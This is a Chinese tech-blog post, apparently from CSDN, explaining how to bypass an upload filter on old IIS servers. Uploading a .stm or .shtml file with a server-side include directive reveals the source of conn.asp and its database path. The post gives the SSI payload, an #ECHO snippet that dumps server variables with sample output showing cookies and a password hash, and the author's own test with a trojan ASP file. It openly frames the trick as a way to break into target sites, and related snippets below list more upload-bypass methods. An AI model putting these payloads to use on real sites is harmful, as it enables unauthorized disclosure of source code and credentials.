当网站不允许上传asp cer cdx htr文件时

最新推荐文章于 2023-07-18 20:24:47 发布
最新推荐文章于 2023-07-18 20:24:47 发布
阅读量950 收藏
点赞数
文章标签: asp web服务 path server 扩展 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HackCode/article/details/2699607
版权
 
关于 web 上传的问题,利用 stm 来上传,还能执行程序,这是一段代码:
< !-- #ECHO var="ALL_HTTP"--><br>
当前文件名称:< !-- #ECHO var="DOCUMENT_NAME"--><br><br>
Web 服务器的名称和版本:< !-- #ECHO var="SERVER_SOFTWARE"--><br>
主机名:< !-- #ECHO var="SERVER_NAME"--><br>
端口:< !-- #ECHO var="SERVER_PORT"--><br>
客户或客户代理 IP 地址:< !-- #ECHO var="REMOTE_ADDR"--><br>
客户或客户代理主机名:< !-- #ECHO var="REMOTE_HOST"--><br>
PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径:< !-- #ECHO var="PATH_TRANSLATED"--><br>
客户端给出附加路径信息:< !-- #ECHO var="PATH_INFO"--><br>
< !-- #ECHO var="HTTP_ACCEPT"--><br>
< !-- #ECHO var="DOCUMENT_URI"--><br>
说保存为 stm 或者 shtml 看看,运行如下:
HTTP_ACCEPT : image / gif , image / x - xbitmap , image / jpeg , image / pjpeg , application / x - shockwave - flash , application / vnd . ms - powerpoint , application / vnd . ms - excel , application / msword , * /* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate
当前文件名称:F:/Web1.stm
Web服务器的名称和版本:Microsoft-IIS/5.0
主机名:localhost
端口:80
客户或客户代理IP地址:127.0.0.1
客户或客户代理主机名:127.0.0.1
PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径:F:/Web1.stm
客户端给出附加路径信息:/1.stm
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */ *


当网站不允许上传
asp cer cdx htr 等文件时, 上传一个 stm 文件, 内容为:
< !-- #include file="conn.asp"-->
直接请求这个 stm 文件, conn . asp 就一览无遗, 数据库路径也就到手啦!

原来就是如上所说的,
< !-- #include file="conn.asp"-->
就是一条 SSI 指令,其作用是将 "info.htm" 的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它 HTML 文档一样显示 info . htm 其中的内容。
我在本地试验成功!在我的 iis 目录下建了一个 test . stm 文件,内容为:
< !-- #include file="ok.asp"-->
又在同一目录下放了一个我的一个木马文件 ok . asp
 在浏览器中请求 test . stm ,没有什么反映,一片空白。
但是一查看源代码,狂晕,原来就是我的 asp 文件的内容!
这样我们就可以利用这个来获取要入侵的 web conn 文件来获得数据库路径,
但是一个前提是服务器的对 stm 或者 shtml 的扩展没有删除!
HackCode
关注
文件上传漏洞方法总结
qq_62886656的博客
04-24 4941
文件上传漏洞 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令 的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传 后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 一 客户端绕过 可以通过禁用js来上传php文件 通过利用 burp 抓包改包,先上传一个 png类型的木马,然后通过 burp 将其改为php 后缀名即可 二 服务端绕过 (1) 黑名单扩展名绕过
浅析文件上传漏洞
L_lemo004的博客
10-20 460
文章目录文件上传成因客户端校验服务器校验原理危害防御解析漏洞 文件上传 成因 对于上传文件的后缀名(扩展名)没有做较为严格的限制 对于上传文件的MIMETYPE 没有做检查 权限上没有控制对于上传文件文件权限,(尤其是对于shebang类型的文件) 对于web server对于上传文件或者指定目录的行为没有做限制 客户端校验 前段js验证 可通过审计修改js代码或burp改包绕过 服务器校验 content-type字段校验 将Content-Type修改为image/gif,或者
网站允许上传ASP,CGI,CER,CDX,HTR等类型的文件
stilling2006的专栏
07-19 1298
方法:上传一个shtm文件, 内容为: 直接请求这个shtm文件, conn.asp就一览无遗, 数据库路径也就到手啦! 解析: 就是一条SSI指令,其作用是将"conn.asp"的内容拷贝到当前的页面中,当访问者来浏览,会看到其 它HTML文档一样显示conn.asp其中的内容。 前提:服务器的对shtm或者shtml的扩展没有删除! 至于conn.asp可以为其他,比如c
网站允许上传,asp cer cdx htr文件, 上传一个stm文件.
weixin_30413739的博客
04-24 141
网站允许上传  asp cer cdx htr文件, 上传一个stm文件, 内容为:  <!--#include file="conn.asp"-->  直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦!  并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!  原来就是如上所说的,  <!--#include file="conn.asp...
允许上传asp cer cdx htr文件解决方法
04-06 1012
一段代码: 当前文件名称: Web服务器的名称和版本:var="SERVER_SOFTWARE"--> 主机名: 端口: 客户或客户代理IP地址: 客户或客户代理主机名: PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径:var="PATH_TRANSLATED"--> 客户端给出附加路径信息: 说保存为stm或者shtml看看,运行如下: HTTP_ACCEPT:image/g
无法上传代码到github
weixin_41827033的博客
01-09 199
重新授权 1.从win10的凭据管理删除与github相关的账号信息 2.从resourcetree管理账号,重新授权账号 3.显示localhost,切默认浏览器edge到firefox 重复2,跳转github授权网页,点同意授权
Motion Analysis HTR (分等级模型运动分析)
GAIA LABORATORY FOR GRAPHICS
11-28 5453
<!--WAU_classic(on999vsd1llr)// -->Motion Analysis HTR 2008-11-17         HTR(Hierarchical Translation-Rotation)是一种分级的模型动画技术,它是从一种.htr文件中读取模型动画信息,然后采用分级模型动画的方法来处理复杂的模型动画。使用3DMA
网站允许上传asp cer cdx htr文件的一个解决方法! Author: Neeao From:http://www.neeao.info
空虚浪子心的blog
11-20 1141
在此感谢lcx大哥!前些天向lcx大哥求教关于web上传的问题,说起利用stm来上传,还能执行程序,不解,就给我了一段代码:见lcx大哥给的一段代码!说保存为stm或者shtml看看,运行如下:HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
上传漏洞
daqiangdetianxia的博客
10-10 315
容器名称 版本 文件名 说明 IIs 6.0 test.asp;.jpg、/test.asp/test.jpg 文件解析 IIS 7.0 test.jpg/.php 默认开启cpi.fi IIS 7.5 a.aspx.a;.a.aspx.jpg…jpg 默认开启cpi.fi Nginx 0.5.*、0.6.*、0.7<=0.765、0.8<=0.837 file.jpg%00.php 00截断 ...
c# 实现对图片上传的接收
大光的博客
12-15 5777
引用: using System.Web; using System.Web.Security; using System.Web.UI; using System.Web.UI.HtmlControls; using System.Web.UI.WebControls; using System.Web.UI.WebControls.WebParts; using BCW.File
IIS6.0 asp.asa.cer.cdx. 原理
KingXai的专栏
12-11 2651
IIS6.0存在两种解析漏洞: 第一种是修改后缀,建立一个“*.asp;.gif”的文件,windows会将他作为一个图片解析,但IIS不会。 第二种是在目录下建立一个“*.asp”的文件夹,然后此文件夹里的所有文件都会被解析为ASP文件然后执行 介绍第一种情况:iis为什么会把asa,cdxcer解析成asp文件呢 原因这四种扩展名都是用的同一个asp.dll文件来执行 看图 那是否
CSDN资源共享规范
热门推荐
CSDN 官方博客
12-11 2万+
CSDN资源共享规范 上传及下载规则 1、CSDN(包括CSDN网站与相应客户端、自媒体平台、主运营网站等)是为广大用户提供资源(包括但不限于文章、文档、音频、视频、图片、课程、软件、源代码等相关资源)共享的网络存储平台,为确保平台依法合规运营,保证广大用户能够正常便捷地分享、使用频道资源,用户上传的所有资源都不得违反国家法律法规。具体如下: (1)不得上传中华人民共和国法律、法规、规章、条...
关于使用git上传代码到github,码云的问题
abcwang1234的博客
03-14 963
使用git上传代码到我们的代码管理工具中去 git无疑是很好的选择 但是对于之前来说使用git比较少的小伙伴来说,可能有一些困惑 对于这些问题我会在这个博文中,持续更新 1。。对于长间未更新的代码,要上传到git中去,代码更改较多,此pull下原来的旧代码 来合并冲突,显然没有什么意义的事情 要想让事情变得更好,个人建议直接在git中创建一个新的分支 然后从本地分支直接去覆盖远程
员工将代码上传至Github,公司可采取哪些合规措施?
kalieningweixiao的博客
06-07 722
经比对披露代码与交付代码,发现披露代码中增加了多个指向盘兴公司、盘石公司的信息,故花儿绽放公司有充分的理由怀疑盘兴公司、盘石公司及其员工非法披露了花儿绽放公司的技术秘密,故花儿绽放公司提起诉讼,最终法院判决盘兴公司、盘石公司赔偿深圳花儿绽放经济损失及合理维权费用共计。大疆公司追究该员工责任,经鉴定,大疆这些泄露出去的代码具有非公知性,且已用于该公司农业无人机产品,属于商业秘密。员工在新博公司工作期间,负责与涉案软件相关的研发工作,获得了涉案软件的源代码,在离职后,该员工未经新博公司同意将软件代码上传至。
2023年网络安全面试题(渗透测试):详细答案解析与最佳实践分享
最新发布
weixin_43263566的博客
07-18 1万+
命令执行漏洞指攻击者可以随意执行系统命令的漏洞。当攻击成功后,攻击者可以继承Web服务程序的权限,执行任意代码、读写文件,甚至控制整个网站或服务器,甚至进一步进行内网渗透。内网攻击莫忽视:在流量分析过程中,不要忽视内网的攻击行为。内网攻击可能是来自恶意软件、僵尸网络或内部威胁等,及发现和响应内网攻击至关重要。企图告警需排查:当发出告警信号,需要仔细排查可能的企图行为。不仅要关注被攻击的目标,还要查看攻击者的来源、攻击方法和可能的目的,以便更好地理解攻击行为。
文件上漏洞学习
RMC131的博客
11-01 188
客户端选择发送的文件–>服务器接收–>网站程序判断–>临文件–>移动到指定的路径0:成功1:文件大小超过php.ini中upload_max_filesize选择限制的值2:文件大小超过了HTML表单中MAX_FILE_SIIZE选项指定的值3:文件只有部分被上传4:没有文件上传过滤的候可以传入aspasp、phpphp大小写转换。
[黑客技术]当网站允许上传asp cer cdx htr文件的一个解决方法
weixin_33785108的博客
07-29 142
一段代码:<!--#ECHOvar="ALL_HTTP"--><br>当前文件名称:<!--#ECHOvar="DOCUMENT_NAME"--><br><br>Web服务器的名称和版本:<!--#ECHOvar="SERVER_SOFTWARE"--><br>主机名:<!--#ECHOva...
IIS6.0文件解析缺陷(asa,cer,cdx)
gscaiyucheng的专栏
07-28 3121
IIS对文件解析可以用ISAPI扩展上传漏洞中,经典的asa、cercdx扩展上传拿webshell都是因为默认情况下,IIS对其后缀名映射到了asp.dll,asp.dll又是ASP脚本的解析文件
vue上传.cer文件并且获取它的详细信息
03-09
你可以使用 FileReader 对象读取上传的 .cer 文件,然后使用 X509.js 库解析它的详细信息。具体实现可以参考以下代码: // 获取上传的 .cer 文件 const file = document.querySelector('input[type="file"]').files[]; // 读取文件内容 const reader = new FileReader(); reader.readAsArrayBuffer(file); reader.onload = function() { const buffer = reader.result; // 解析 .cer 文件 const cert = new X509(); cert.readCertHex(buffer); // 获取证书详细信息 const subject = cert.getSubjectString(); const issuer = cert.getIssuerString(); const validFrom = cert.getNotBefore(); const validTo = cert.getNotAfter(); const publicKey = cert.getPublicKey(); // 输出证书详细信息 console.log('Subject:', subject); console.log('Issuer:', issuer); console.log('Valid From:', validFrom); console.log('Valid To:', validTo); console.log('Public Key:', publicKey); };
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值